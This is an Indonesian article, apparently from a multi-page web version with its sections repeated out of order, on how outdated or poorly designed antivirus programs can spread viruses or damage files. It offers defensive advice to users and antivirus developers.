Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
INILAH YANG PERLU ANDA LAKUKAN SEBAGAI PENGGUNA
Sebagai pengguna program antivirus ada beberapa hal yang bisa Anda lakukan untuk meminimalkan risiko penggunaan antivirus
Carilah antivirus yang baik, baik di sini artinya program tersebut dapat dipercaya untuk mendeteksi dan membasmi berbagai virus yang ada. Jangan terbuai dengan janji-janji yang ditawarkan para vendor antivirus, dan jangan terbuai juga dengan nama merk yang cukup terkenal. Cobalah cari perbandingan antara berbagai antivirus di berbagai majalah / situs di internet.
Gunakan selalu Antivirus terbaru, Anda bisa mendapatkannya dari Internet atau dari beberapa majalah. Antivirus yang lama memiliki risiko yang besar jika digunakan (lebih dari 6 bulan sudah sangat berbahaya).
Buatlah cadangan untuk data dan program Anda yang penting.
Lakukan proses pembersihan virus dengan benar jika Anda menemukan virus
Pastikan program Antivirus yang Anda dapat adalah yang asli, ada kemungkinan seseorang telah mengubah antivirus tersebut, atau mungkin menularinya dengan suatu virus.
Hubungi ahlinya jika Anda merasa tidak dapat mengatasi virus di komputer atau jaringan Anda.
Langkah proses pembersihan yang baik adalah sebagai berikut
Jika Anda menjalankan komputer pribadi
Boot komputer Anda dengan disket startup yang bersih dari virus (dan di write protect)
Jalankan program virus scanner/cleaner pada sebuah file yang terinfeksi
Coba jalankan file tersebut, jika file tersebut menjadi rusak, jangan teruskan lagi
Jika program dapat berjalan lancar, cobakan sekali lagi pada beberapa file (cari yang ukurannya kecil, yang sedang dan yang besar). File yang ukurannya besar perlu di-check, biasanya file ini mengandung internal overlay yang membuat filenya rusak jika terkena virus.
Jika Anda adalah Admin jaringan, sebaiknya Anda mengambil sampel virus ke disket dan mencoba untuk membersihkannya di komputer lain, ini dilakukan untuk tidak mengganggu pekerjaan yang mungkin sedang dilakukan oleh orang lain. Hal ini juga untuk mengantisipasi, kemungkinan adanya virus baru yang mirip dengan virus lain (bayangkan apa jadinya jika terjadi salah pembersihan sehingga seluruh program di jaringan menjadi tidak bisa dipakai!). Jika gagal dibersihkan Anda perlu memanggil ahlinya untuk menangani, atau mencari informasi lebih lanjut di Internet. Percobaan pada beberapa file tujuannya untuk mencegah salah deteksi dan atau salah perbaikan oleh program antivirus. Jika virus dianggap berbahaya dan aktivitas menggunakan jaringan bisa ditunda sementara, mungkin untuk sementara jaringan dimatikan.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
SEBAGAI PROGRAMMER INI YANG PERLU ANDA LAKUKAN
Saat ini untuk menjadi programmer antivirus yang baik tidaklah mudah, Anda perlu tahu teknik-teknik pemrograman virus yang setiap hari semakin bertambah sulit. Program antivirus yang Anda buat sebaiknya juga mengikuti perkembangan teknologi virus. Untuk membuat program antivirus yang baik tidaklah mudah, namun ada beberapa hal yang perlu Anda ingat sebagai pembuat Antivirus jika Anda ingin program Anda dipakai orang lain, dan tidak membahayakan orang tersebut
Program Anda sebaiknya bisa mematikan virus di memori, dan dapat memberi peringatan jika ada sesuatu yang aneh di memori komputer pemakai (misalnya besar base mem kurang dari 640 Kb)
Dalam membuat ID virus pilihlah beberapa lokasi, lokasi yang baik adalah di awal virus dan di bagian penting virus (misalnya di bagian dekripsi header program asli) ini untuk memastikan tidak ada yang mengubah lokasi dan sistem enkripsi (jika ada) header program asli.
Jika data/header di enkrip, verifikasikan data yang didapat dari perhitungan, misalnya lihat apakah CS dan IP asli yang di dapat dari perhitungan masih dalam batas besar file, atau apakah instruksi JMP pertama di file COM masuk akal (kurang dari panjang file).
Buat cadangan file jika file yang dibersihkan dikhawatirkan rusak
Lakukan self check di awal program. Jika tidak seluruh bagian program bisa di self check, bagian ID virus perlu diperiksa apakah berubah atau tidak (misalnya dengan checksum).
Buatlah penjelasan yang jelas tentang cara penggunaan antivirus
Jika program hanya dapat dijalankan di DOS periksalah selalu ketika program dijalankan apakah program tersebut benar-benar berjalan di DOS
Jika ingin membuat program antivirus residen, jangan memakai ID virus yang tidak terenkripsi di memori, antivirus lain yang tidak mengenal antivirus Anda tersebut, justru akan menganggap adanya sebuah (atau beberapa buah) virus aktif di memori. Hal ini bisa terjadi, karena beberapa antivirus memeriksa seluruh memori terhadap adanya ID virus.
Untuk antivirus yang non residen teknik no 8 juga perlu digunakan, ini perlu agar program antivirus yang lain tidak mengira program ini terkena virus. Kadang-kadang program juga meninggalkan bekas di memori, yang mungkin bisa dicurigai oleh antivirus lain sebagai virus. Jika Anda tidak ingin menerapkan teknik tersebut, Anda bisa menghapus memori variabel ID virus setelah selesai digunakan.
Jika mungkin, untuk virus yang polimorfik gunakan metode heuristic (dan atau emulasi) untuk men-scan dan teknik emulasi untuk mendekrip, atau mengembalikan program asli.
Seharusnya 10 hal tersebut cukup, Anda bisa menambahkan sendiri hal tersebut jika perlu. Misalnya masalah kecepatan scanning dan lain-lain.
Simpulan dan penutup
Kiranya setelah membaca artikel di atas, para pemakai dan programmer antivirus dapat mendapatkan pengetahuan yang baru mengenai antivirus komputer. Sebagai pemakai antivirus, Anda harus lebih hati-hati, dan dengan rajin mengupdate antivirus Anda. Hal ini sangat perlu dilakukan, terutama bagi Anda yang terhubung ke Internet, sudah banyak virus yang menyebarkan dirinya lewat e-mail, dan dengan memanfaatkan beberapa bug dari perangkat email client Anda beberapa virus dapat menyebar tanpa Anda sadari (saat artikel ini dibuat, ada laporan dari sumber yang terpercaya bahwa ada bug di outlook yang memungkinkan attachment di eksekusi tanpa diketahui user).
Bagi para programmer antivirus, kiranya Anda tergerak untuk mempelajari lagi lebih banyak mengenai teknik-teknik virus, dan teknik-teknik untuk membasminya. Saat ini penulis virus di Indonesia belum terlalu banyak, tapi nanti ketika muncul berbagai virus dengan teknologi tinggi buatan bangsa sendiri, tentunya kita harus bisa membasminya (dengan baik dan benar tentunya), tidakkah kita akan malu, jika harus menggantungkan diri pada antivirus buatan luar negeri?.
Artikel ini bukanlah artikel yang lengkap mengenai pembuatan program antivirus yang baik, juga bukan tutorial yang lengkap mengenai penggunaan antivirus dengan baik dan benar, melainkan hanya sebuah artikel singkat agar para pemakai dan programmer lebih mewaspadai virus dengan lebih memperhatikan aspek antivirusnya.
Oleh : Yohanes Nugroho
Sejak pertama ditemukan virus telah mengalami perkembangan teknologi yang cukup besar, demikian juga program Antivirus yang ada. Sayangnya perkembangan Antivirus biasanya hanya mengejar perkembangan virus dan bukan berusaha mendahuluinya. Antivirus yang ketinggalan (teknologinya) justru dapat mengundang bahaya bagi pemakai.
Ketika virus-virus berhasil dideteksi keberadaannya, virus-virus yang baru selalu bermunculan dengan teknologi yang lebih canggih yang membuat antivirus menjadi tak berdaya . Antivirus yang lama misalnya, selalu dapat di-'tipu' dengan teknologi stealth, dengan demikian ketika antivirus ini berusaha mendeteksi file-file yang lain, virus yang stealth tadi justru menyebarkan dirinya ke setiap file yang diperiksa.
Di berbagai majalah tentunya Anda sering melihat adanya program-program antivirus " satuan " (spesifik) yang tujuannya untuk mendeteksi satu jenis virus. Biasanya para pembuat antivirus tidak memberitahukan cara-cara yang benar untuk menggunakan program antivirus ini, padahal antivirus spesifik memiliki risiko yang besar jika tidak digunakan secara benar.
Antivirus spesifik hanya mampu mendeteksi satu jenis virus (dan mungkin beberapa variannya) dan biasanya mampu melumpuhkan virus di memori. Jika Anda menemukan suatu virus dan Anda yakin nama virusnya Anda bisa menggunakan Antivirus semacam ini, namun jika Anda tidak tahu, sebaiknya jangan coba-coba. Jika ternyata virus yang aktif adalah virus lain, yang tentunya tidak terdeteksi oleh antivirus ini, maka antivirus tersebut justru dapat menyebarkan virus yang ada ke seluruh file program yang diperiksanya.
Bahaya yang lebih menakutkan adalah jika antivirus salah mendeteksi suatu virus dan salah membersihkannya sehingga file program yang Anda coba untuk perbaiki justru menjadi rusak. Kejadian ini pernah terjadi misalnya pada kasus virus DenHard, virus ini benar-benar mirip dengan die hard, namun virus ini menggunakan teknik yang berbeda untuk mengembalikan header file yang asli, beberapa antivirus yang berusaha membersihkannya justru merusakkan file program tempat virus itu berada. Selain terjadi pada kasus virus DenHard, kasus inipun pernah (dan mungkin masih akan terus) terjadi pada beberapa virus. Salah satu alasan para pembuat virus membuat virus yang mirip adalah supaya virus tersebut sulit dibersihkan, karena para pembuat antivirus tidak suka jika virusnya dapat dengan mudah dibersihkan oleh user.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
SUMBER BAHAYA PROGRAM ANTIVIRUS
Program Antivirus bisa berbahaya karena sebab-sebab berikut:
Beberapa program antivirus hanya menggunakan teknik sederhana yang bisa dengan mudah di-tipu oleh pembuat virus Misalnya program antivirus hanya memeriksa beberapa byte di awal virus, pembuat virus bisa saja membuat virus versi lain yang sama di bagian awal tetapi berbeda di bagian-bagian yang penting, misalnya di rutin enkripsi/dekripsi header file asli. Ini akan membuat program antivirus menjadi perusak file bukan penyelamat file. Beberapa antivirus juga dapat di tipu dengan mengubah-ubah file signature antivirus. File signature merupakan file yang berisi ID dari setiap virus yang dikenal oleh antivirus, jika ID tersebut di ubah maka antivirus tidak akan mengenalnya. Antivirus yang baik seharusnya dapat memeriksa jika file signature-nya berubah.
Program Antivirus tidak membuat backup file yang dibersihkan. Sering program antivirus (terutama yang spesifik) tidak menyediakan sarana untuk membuat backup file yang dibersihkan, padahal ini sangat penting andaikata proses pembersihan gagal.
Program Antivirus tidak melakukan self check. Self check itu perlu, program antivirus dapat saja diubah oleh orang lain sebelum sampai ke tangan pengguna. Program-program antivirus komersial biasanya melakukan self check untuk memastikan dirinya tidak diubah oleh siapapun, namun ada juga yang tidak dan ini berbahaya. Pada program-program antivirus lokal, yang sering disertakan pada beberapa artikel komputer, biasanya menyertakan source code-nya, sebaiknya Anda mengcompile sendiri source tersebut jika Anda ragu pada keaslian file exe-nya.
Program Antivirus residen bisa di matikan dengan mudah Antivirus residen yang baik seharusnya tidak bisa dideteksi dan di uninstall dengan mudah. Contoh antivirus residen yang kurang baik adalah VSAFE (ada di paket DOS). VSAFE bisa dideteksi dan dimatikan dengan menggunakan interrupt (coba Anda pelajari/debug program vsafe yang ada di DOS agar Anda mengerti). Pemakai akan mendapatkan rasa aman yang palsu dengan menggunakan antivirus semacam ini. Tidak ada rasa aman justru lebih baik dari rasa aman yang palsu.
Program antivirus tidak memberi peringatan kadaluarsa. Seiring dengan berjalannya waktu, virus-virus yang bermunculan semakin banyak dan tekniknya semakin canggih. Program antivirus yang baik sebaiknya memberi peringatan jika Antivirus yang digunakan sudah terlalu out of date. Ini penting supaya kejadian antivirus yang menyebarkan virus tidak terulang.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
INILAH YANG PERLU ANDA LAKUKAN SEBAGAI PENGGUNA
Sebagai pengguna program antivirus ada beberapa hal yang bisa Anda lakukan untuk meminimalkan risiko penggunaan antivirus
Carilah antivirus yang baik, baik di sini artinya program tersebut dapat dipercaya untuk mendeteksi dan membasmi berbagai virus yang ada. Jangan terbuai dengan janji-janji yang ditawarkan para vendor antivirus, dan jangan terbuai juga dengan nama merk yang cukup terkenal. Cobalah cari perbandingan antara berbagai antivirus di berbagai majalah / situs di internet.
Gunakan selalu Antivirus terbaru, Anda bisa mendapatkannya dari Internet atau dari beberapa majalah. Antivirus yang lama memiliki risiko yang besar jika digunakan (lebih dari 6 bulan sudah sangat berbahaya).
Buatlah cadangan untuk data dan program Anda yang penting.
Lakukan proses pembersihan virus dengan benar jika Anda menemukan virus
Pastikan program Antivirus yang Anda dapat adalah yang asli, ada kemungkinan seseorang telah mengubah antivirus tersebut, atau mungkin menularinya dengan suatu virus.
Hubungi ahlinya jika Anda merasa tidak dapat mengatasi virus di komputer atau jaringan Anda.
Langkah proses pembersihan yang baik adalah sebagai berikut
Jika Anda menjalankan komputer pribadi
Boot komputer Anda dengan disket startup yang bersih dari virus (dan di write protect)
Jalankan program virus scanner/cleaner pada sebuah file yang terinfeksi
Coba jalankan file tersebut, jika file tersebut menjadi rusak, jangan teruskan lagi
Jika program dapat berjalan lancar, cobakan sekali lagi pada beberapa file (cari yang ukurannya kecil, yang sedang dan yang besar). File yang ukurannya besar perlu di-check, biasanya file ini mengandung internal overlay yang membuat filenya rusak jika terkena virus.
Jika Anda adalah Admin jaringan, sebaiknya Anda mengambil sampel virus ke disket dan mencoba untuk membersihkannya di komputer lain, ini dilakukan untuk tidak mengganggu pekerjaan yang mungkin sedang dilakukan oleh orang lain. Hal ini juga untuk mengantisipasi, kemungkinan adanya virus baru yang mirip dengan virus lain (bayangkan apa jadinya jika terjadi salah pembersihan sehingga seluruh program di jaringan menjadi tidak bisa dipakai!). Jika gagal dibersihkan Anda perlu memanggil ahlinya untuk menangani, atau mencari informasi lebih lanjut di Internet. Percobaan pada beberapa file tujuannya untuk mencegah salah deteksi dan atau salah perbaikan oleh program antivirus. Jika virus dianggap berbahaya dan aktivitas menggunakan jaringan bisa ditunda sementara, mungkin untuk sementara jaringan dimatikan.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
SEBAGAI PROGRAMMER INI YANG PERLU ANDA LAKUKAN
Saat ini untuk menjadi programmer antivirus yang baik tidaklah mudah, Anda perlu tahu teknik-teknik pemrograman virus yang setiap hari semakin bertambah sulit. Program antivirus yang Anda buat sebaiknya juga mengikuti perkembangan teknologi virus. Untuk membuat program antivirus yang baik tidaklah mudah, namun ada beberapa hal yang perlu Anda ingat sebagai pembuat Antivirus jika Anda ingin program Anda dipakai orang lain, dan tidak membahayakan orang tersebut
Program Anda sebaiknya bisa mematikan virus di memori, dan dapat memberi peringatan jika ada sesuatu yang aneh di memori komputer pemakai (misalnya besar base mem kurang dari 640 Kb)
Dalam membuat ID virus pilihlah beberapa lokasi, lokasi yang baik adalah di awal virus dan di bagian penting virus (misalnya di bagian dekripsi header program asli) ini untuk memastikan tidak ada yang mengubah lokasi dan sistem enkripsi (jika ada) header program asli.
Jika data/header di enkrip, verifikasikan data yang didapat dari perhitungan, misalnya lihat apakah CS dan IP asli yang di dapat dari perhitungan masih dalam batas besar file, atau apakah instruksi JMP pertama di file COM masuk akal (kurang dari panjang file).
Buat cadangan file jika file yang dibersihkan dikhawatirkan rusak
Lakukan self check di awal program. Jika tidak seluruh bagian program bisa di self check, bagian ID virus perlu diperiksa apakah berubah atau tidak (misalnya dengan checksum).
Buatlah penjelasan yang jelas tentang cara penggunaan antivirus
Jika program hanya dapat dijalankan di DOS periksalah selalu ketika program dijalankan apakah program tersebut benar-benar berjalan di DOS
Jika ingin membuat program antivirus residen, jangan memakai ID virus yang tidak terenkripsi di memori, antivirus lain yang tidak mengenal antivirus Anda tersebut, justru akan menganggap adanya sebuah (atau beberapa buah) virus aktif di memori. Hal ini bisa terjadi, karena beberapa antivirus memeriksa seluruh memori terhadap adanya ID virus.
Untuk antivirus yang non residen teknik no 8 juga perlu digunakan, ini perlu agar program antivirus yang lain tidak mengira program ini terkena virus. Kadang-kadang program juga meninggalkan bekas di memori, yang mungkin bisa dicurigai oleh antivirus lain sebagai virus. Jika Anda tidak ingin menerapkan teknik tersebut, Anda bisa menghapus memori variabel ID virus setelah selesai digunakan.
Jika mungkin, untuk virus yang polimorfik gunakan metode heuristic (dan atau emulasi) untuk men-scan dan teknik emulasi untuk mendekrip, atau mengembalikan program asli.
Seharusnya 10 hal tersebut cukup, Anda bisa menambahkan sendiri hal tersebut jika perlu. Misalnya masalah kecepatan scanning dan lain-lain.
Simpulan dan penutup
Kiranya setelah membaca artikel di atas, para pemakai dan programmer antivirus dapat mendapatkan pengetahuan yang baru mengenai antivirus komputer. Sebagai pemakai antivirus, Anda harus lebih hati-hati, dan dengan rajin mengupdate antivirus Anda. Hal ini sangat perlu dilakukan, terutama bagi Anda yang terhubung ke Internet, sudah banyak virus yang menyebarkan dirinya lewat e-mail, dan dengan memanfaatkan beberapa bug dari perangkat email client Anda beberapa virus dapat menyebar tanpa Anda sadari (saat artikel ini dibuat, ada laporan dari sumber yang terpercaya bahwa ada bug di outlook yang memungkinkan attachment di eksekusi tanpa diketahui user).
Bagi para programmer antivirus, kiranya Anda tergerak untuk mempelajari lagi lebih banyak mengenai teknik-teknik virus, dan teknik-teknik untuk membasminya. Saat ini penulis virus di Indonesia belum terlalu banyak, tapi nanti ketika muncul berbagai virus dengan teknologi tinggi buatan bangsa sendiri, tentunya kita harus bisa membasminya (dengan baik dan benar tentunya), tidakkah kita akan malu, jika harus menggantungkan diri pada antivirus buatan luar negeri?.
Artikel ini bukanlah artikel yang lengkap mengenai pembuatan program antivirus yang baik, juga bukan tutorial yang lengkap mengenai penggunaan antivirus dengan baik dan benar, melainkan hanya sebuah artikel singkat agar para pemakai dan programmer lebih mewaspadai virus dengan lebih memperhatikan aspek antivirusnya.
BAHAYA PROGRAM AV
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
Sejak pertama ditemukan virus telah mengalami perkembangan teknologi yang cukup besar, demikian juga program Antivirus yang ada. Sayangnya perkembangan Antivirus biasanya hanya mengejar perkembangan virus dan bukan berusaha mendahuluinya. Antivirus yang ketinggalan (teknologinya) justru dapat mengundang bahaya bagi pemakai.
Ketika virus-virus berhasil dideteksi keberadaannya, virus-virus yang baru selalu bermunculan dengan teknologi yang lebih canggih yang membuat antivirus menjadi tak berdaya . Antivirus yang lama misalnya, selalu dapat di-'tipu' dengan teknologi stealth, dengan demikian ketika antivirus ini berusaha mendeteksi file-file yang lain, virus yang stealth tadi justru menyebarkan dirinya ke setiap file yang diperiksa.
Di berbagai majalah tentunya Anda sering melihat adanya program-program antivirus " satuan " (spesifik) yang tujuannya untuk mendeteksi satu jenis virus. Biasanya para pembuat antivirus tidak memberitahukan cara-cara yang benar untuk menggunakan program antivirus ini, padahal antivirus spesifik memiliki risiko yang besar jika tidak digunakan secara benar.
Antivirus spesifik hanya mampu mendeteksi satu jenis virus (dan mungkin beberapa variannya) dan biasanya mampu melumpuhkan virus di memori. Jika Anda menemukan suatu virus dan Anda yakin nama virusnya Anda bisa menggunakan Antivirus semacam ini, namun jika Anda tidak tahu, sebaiknya jangan coba-coba. Jika ternyata virus yang aktif adalah virus lain, yang tentunya tidak terdeteksi oleh antivirus ini, maka antivirus tersebut justru dapat menyebarkan virus yang ada ke seluruh file program yang diperiksanya.
Bahaya yang lebih menakutkan adalah jika antivirus salah mendeteksi suatu virus dan salah membersihkannya sehingga file program yang Anda coba untuk perbaiki justru menjadi rusak. Kejadian ini pernah terjadi misalnya pada kasus virus DenHard, virus ini benar-benar mirip dengan die hard, namun virus ini menggunakan teknik yang berbeda untuk mengembalikan header file yang asli, beberapa antivirus yang berusaha membersihkannya justru merusakkan file program tempat virus itu berada. Selain terjadi pada kasus virus DenHard, kasus inipun pernah (dan mungkin masih akan terus) terjadi pada beberapa virus. Salah satu alasan para pembuat virus membuat virus yang mirip adalah supaya virus tersebut sulit dibersihkan, karena para pembuat antivirus tidak suka jika virusnya dapat dengan mudah dibersihkan oleh user.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
SUMBER BAHAYA PROGRAM ANTIVIRUS
Program Antivirus bisa berbahaya karena sebab-sebab berikut:
Beberapa program antivirus hanya menggunakan teknik sederhana yang bisa dengan mudah di-tipu oleh pembuat virus Misalnya program antivirus hanya memeriksa beberapa byte di awal virus, pembuat virus bisa saja membuat virus versi lain yang sama di bagian awal tetapi berbeda di bagian-bagian yang penting, misalnya di rutin enkripsi/dekripsi header file asli. Ini akan membuat program antivirus menjadi perusak file bukan penyelamat file. Beberapa antivirus juga dapat di tipu dengan mengubah-ubah file signature antivirus. File signature merupakan file yang berisi ID dari setiap virus yang dikenal oleh antivirus, jika ID tersebut di ubah maka antivirus tidak akan mengenalnya. Antivirus yang baik seharusnya dapat memeriksa jika file signature-nya berubah.
Program Antivirus tidak membuat backup file yang dibersihkan. Sering program antivirus (terutama yang spesifik) tidak menyediakan sarana untuk membuat backup file yang dibersihkan, padahal ini sangat penting andaikata proses pembersihan gagal.
Program Antivirus tidak melakukan self check. Self check itu perlu, program antivirus dapat saja diubah oleh orang lain sebelum sampai ke tangan pengguna. Program-program antivirus komersial biasanya melakukan self check untuk memastikan dirinya tidak diubah oleh siapapun, namun ada juga yang tidak dan ini berbahaya. Pada program-program antivirus lokal, yang sering disertakan pada beberapa artikel komputer, biasanya menyertakan source code-nya, sebaiknya Anda mengcompile sendiri source tersebut jika Anda ragu pada keaslian file exe-nya.
Program Antivirus residen bisa di matikan dengan mudah Antivirus residen yang baik seharusnya tidak bisa dideteksi dan di uninstall dengan mudah. Contoh antivirus residen yang kurang baik adalah VSAFE (ada di paket DOS). VSAFE bisa dideteksi dan dimatikan dengan menggunakan interrupt (coba Anda pelajari/debug program vsafe yang ada di DOS agar Anda mengerti). Pemakai akan mendapatkan rasa aman yang palsu dengan menggunakan antivirus semacam ini. Tidak ada rasa aman justru lebih baik dari rasa aman yang palsu.
Program antivirus tidak memberi peringatan kadaluarsa. Seiring dengan berjalannya waktu, virus-virus yang bermunculan semakin banyak dan tekniknya semakin canggih. Program antivirus yang baik sebaiknya memberi peringatan jika Antivirus yang digunakan sudah terlalu out of date. Ini penting supaya kejadian antivirus yang menyebarkan virus tidak terulang.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
INILAH YANG PERLU ANDA LAKUKAN SEBAGAI PENGGUNA
Sebagai pengguna program antivirus ada beberapa hal yang bisa Anda lakukan untuk meminimalkan risiko penggunaan antivirus
Carilah antivirus yang baik, baik di sini artinya program tersebut dapat dipercaya untuk mendeteksi dan membasmi berbagai virus yang ada. Jangan terbuai dengan janji-janji yang ditawarkan para vendor antivirus, dan jangan terbuai juga dengan nama merk yang cukup terkenal. Cobalah cari perbandingan antara berbagai antivirus di berbagai majalah / situs di internet.
Gunakan selalu Antivirus terbaru, Anda bisa mendapatkannya dari Internet atau dari beberapa majalah. Antivirus yang lama memiliki risiko yang besar jika digunakan (lebih dari 6 bulan sudah sangat berbahaya).
Buatlah cadangan untuk data dan program Anda yang penting.
Lakukan proses pembersihan virus dengan benar jika Anda menemukan virus
Pastikan program Antivirus yang Anda dapat adalah yang asli, ada kemungkinan seseorang telah mengubah antivirus tersebut, atau mungkin menularinya dengan suatu virus.
Hubungi ahlinya jika Anda merasa tidak dapat mengatasi virus di komputer atau jaringan Anda.
Langkah proses pembersihan yang baik adalah sebagai berikut
Jika Anda menjalankan komputer pribadi
Boot komputer Anda dengan disket startup yang bersih dari virus (dan di write protect)
Jalankan program virus scanner/cleaner pada sebuah file yang terinfeksi
Coba jalankan file tersebut, jika file tersebut menjadi rusak, jangan teruskan lagi
Jika program dapat berjalan lancar, cobakan sekali lagi pada beberapa file (cari yang ukurannya kecil, yang sedang dan yang besar). File yang ukurannya besar perlu di-check, biasanya file ini mengandung internal overlay yang membuat filenya rusak jika terkena virus.
Jika Anda adalah Admin jaringan, sebaiknya Anda mengambil sampel virus ke disket dan mencoba untuk membersihkannya di komputer lain, ini dilakukan untuk tidak mengganggu pekerjaan yang mungkin sedang dilakukan oleh orang lain. Hal ini juga untuk mengantisipasi, kemungkinan adanya virus baru yang mirip dengan virus lain (bayangkan apa jadinya jika terjadi salah pembersihan sehingga seluruh program di jaringan menjadi tidak bisa dipakai!). Jika gagal dibersihkan Anda perlu memanggil ahlinya untuk menangani, atau mencari informasi lebih lanjut di Internet. Percobaan pada beberapa file tujuannya untuk mencegah salah deteksi dan atau salah perbaikan oleh program antivirus. Jika virus dianggap berbahaya dan aktivitas menggunakan jaringan bisa ditunda sementara, mungkin untuk sementara jaringan dimatikan.
Oleh : Yohanes Nugroho
Sejak pertama ditemukan virus telah mengalami perkembangan teknologi yang cukup besar, demikian juga program Antivirus yang ada. Sayangnya perkembangan Antivirus biasanya hanya mengejar perkembangan virus dan bukan berusaha mendahuluinya. Antivirus yang ketinggalan (teknologinya) justru dapat mengundang bahaya bagi pemakai.
Ketika virus-virus berhasil dideteksi keberadaannya, virus-virus yang baru selalu bermunculan dengan teknologi yang lebih canggih yang membuat antivirus menjadi tak berdaya . Antivirus yang lama misalnya, selalu dapat di-'tipu' dengan teknologi stealth, dengan demikian ketika antivirus ini berusaha mendeteksi file-file yang lain, virus yang stealth tadi justru menyebarkan dirinya ke setiap file yang diperiksa.
Di berbagai majalah tentunya Anda sering melihat adanya program-program antivirus " satuan " (spesifik) yang tujuannya untuk mendeteksi satu jenis virus. Biasanya para pembuat antivirus tidak memberitahukan cara-cara yang benar untuk menggunakan program antivirus ini, padahal antivirus spesifik memiliki risiko yang besar jika tidak digunakan secara benar.
Antivirus spesifik hanya mampu mendeteksi satu jenis virus (dan mungkin beberapa variannya) dan biasanya mampu melumpuhkan virus di memori. Jika Anda menemukan suatu virus dan Anda yakin nama virusnya Anda bisa menggunakan Antivirus semacam ini, namun jika Anda tidak tahu, sebaiknya jangan coba-coba. Jika ternyata virus yang aktif adalah virus lain, yang tentunya tidak terdeteksi oleh antivirus ini, maka antivirus tersebut justru dapat menyebarkan virus yang ada ke seluruh file program yang diperiksanya.
Bahaya yang lebih menakutkan adalah jika antivirus salah mendeteksi suatu virus dan salah membersihkannya sehingga file program yang Anda coba untuk perbaiki justru menjadi rusak. Kejadian ini pernah terjadi misalnya pada kasus virus DenHard, virus ini benar-benar mirip dengan die hard, namun virus ini menggunakan teknik yang berbeda untuk mengembalikan header file yang asli, beberapa antivirus yang berusaha membersihkannya justru merusakkan file program tempat virus itu berada. Selain terjadi pada kasus virus DenHard, kasus inipun pernah (dan mungkin masih akan terus) terjadi pada beberapa virus. Salah satu alasan para pembuat virus membuat virus yang mirip adalah supaya virus tersebut sulit dibersihkan, karena para pembuat antivirus tidak suka jika virusnya dapat dengan mudah dibersihkan oleh user.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
SUMBER BAHAYA PROGRAM ANTIVIRUS
Program Antivirus bisa berbahaya karena sebab-sebab berikut:
Beberapa program antivirus hanya menggunakan teknik sederhana yang bisa dengan mudah di-tipu oleh pembuat virus Misalnya program antivirus hanya memeriksa beberapa byte di awal virus, pembuat virus bisa saja membuat virus versi lain yang sama di bagian awal tetapi berbeda di bagian-bagian yang penting, misalnya di rutin enkripsi/dekripsi header file asli. Ini akan membuat program antivirus menjadi perusak file bukan penyelamat file. Beberapa antivirus juga dapat di tipu dengan mengubah-ubah file signature antivirus. File signature merupakan file yang berisi ID dari setiap virus yang dikenal oleh antivirus, jika ID tersebut di ubah maka antivirus tidak akan mengenalnya. Antivirus yang baik seharusnya dapat memeriksa jika file signature-nya berubah.
Program Antivirus tidak membuat backup file yang dibersihkan. Sering program antivirus (terutama yang spesifik) tidak menyediakan sarana untuk membuat backup file yang dibersihkan, padahal ini sangat penting andaikata proses pembersihan gagal.
Program Antivirus tidak melakukan self check. Self check itu perlu, program antivirus dapat saja diubah oleh orang lain sebelum sampai ke tangan pengguna. Program-program antivirus komersial biasanya melakukan self check untuk memastikan dirinya tidak diubah oleh siapapun, namun ada juga yang tidak dan ini berbahaya. Pada program-program antivirus lokal, yang sering disertakan pada beberapa artikel komputer, biasanya menyertakan source code-nya, sebaiknya Anda mengcompile sendiri source tersebut jika Anda ragu pada keaslian file exe-nya.
Program Antivirus residen bisa di matikan dengan mudah Antivirus residen yang baik seharusnya tidak bisa dideteksi dan di uninstall dengan mudah. Contoh antivirus residen yang kurang baik adalah VSAFE (ada di paket DOS). VSAFE bisa dideteksi dan dimatikan dengan menggunakan interrupt (coba Anda pelajari/debug program vsafe yang ada di DOS agar Anda mengerti). Pemakai akan mendapatkan rasa aman yang palsu dengan menggunakan antivirus semacam ini. Tidak ada rasa aman justru lebih baik dari rasa aman yang palsu.
Program antivirus tidak memberi peringatan kadaluarsa. Seiring dengan berjalannya waktu, virus-virus yang bermunculan semakin banyak dan tekniknya semakin canggih. Program antivirus yang baik sebaiknya memberi peringatan jika Antivirus yang digunakan sudah terlalu out of date. Ini penting supaya kejadian antivirus yang menyebarkan virus tidak terulang.
Bahaya Program Anti Virus
Oleh : Yohanes Nugroho
INILAH YANG PERLU ANDA LAKUKAN SEBAGAI PENGGUNA
Sebagai pengguna program antivirus ada beberapa hal yang bisa Anda lakukan untuk meminimalkan risiko penggunaan antivirus
Carilah antivirus yang baik, baik di sini artinya program tersebut dapat dipercaya untuk mendeteksi dan membasmi berbagai virus yang ada. Jangan terbuai dengan janji-janji yang ditawarkan para vendor antivirus, dan jangan terbuai juga dengan nama merk yang cukup terkenal. Cobalah cari perbandingan antara berbagai antivirus di berbagai majalah / situs di internet.
Gunakan selalu Antivirus terbaru, Anda bisa mendapatkannya dari Internet atau dari beberapa majalah. Antivirus yang lama memiliki risiko yang besar jika digunakan (lebih dari 6 bulan sudah sangat berbahaya).
Buatlah cadangan untuk data dan program Anda yang penting.
Lakukan proses pembersihan virus dengan benar jika Anda menemukan virus
Pastikan program Antivirus yang Anda dapat adalah yang asli, ada kemungkinan seseorang telah mengubah antivirus tersebut, atau mungkin menularinya dengan suatu virus.
Hubungi ahlinya jika Anda merasa tidak dapat mengatasi virus di komputer atau jaringan Anda.
Langkah proses pembersihan yang baik adalah sebagai berikut
Jika Anda menjalankan komputer pribadi
Boot komputer Anda dengan disket startup yang bersih dari virus (dan di write protect)
Jalankan program virus scanner/cleaner pada sebuah file yang terinfeksi
Coba jalankan file tersebut, jika file tersebut menjadi rusak, jangan teruskan lagi
Jika program dapat berjalan lancar, cobakan sekali lagi pada beberapa file (cari yang ukurannya kecil, yang sedang dan yang besar). File yang ukurannya besar perlu di-check, biasanya file ini mengandung internal overlay yang membuat filenya rusak jika terkena virus.
